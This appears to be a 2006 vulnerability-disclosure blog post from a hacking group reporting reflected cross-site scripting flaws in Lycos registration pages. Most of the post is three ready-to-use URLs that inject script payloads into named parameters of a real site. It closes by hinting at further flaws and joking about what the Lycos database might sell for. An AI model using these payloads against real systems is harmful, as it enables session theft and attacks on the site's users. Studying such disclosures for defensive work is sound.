by r0t,der4444,cembo,VietMafia

Thursday, June 01, 2006

XSS in Lycos.com

Here will be some examples:

https://ldbreg.lycos.com/cgi-bin/mayaRegister?m_RC=
6&m_PR=2&m_CBURL=%22%3Cscript%3Ealert('r0t')%3C/script%3E

https://ldbreg.lycos.com/cgi-bin/mayaRegister?m_RC=6&m_PR
=2&m_CBURL=http%3A%2F%2Fpridels.blogspot.com%2F&m_CBERRURL
=%22%3Cscript%3Ealert('r0t')%3C/script%3E

https://ldbreg.lycos.com/cgi-bin/mayaRegister?m_RC=6&m_PR=2
&m_CBURL=http%3A%2F%2Fpridels.blogspot.com%2F&m_CBERRURL=ht
tp%3A%2F%2Fpridels.blogspot.com%2F&m_LANG=1&Z=1149121877&m_
AL=2&m_DL_FREE=%22%3Cscript%3Ealert('r0t')%3C/script%3E



ps.lycos contains alot more XSS and other vuln.
I dont know how much can cost db from lycos:)

0 Comments:

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew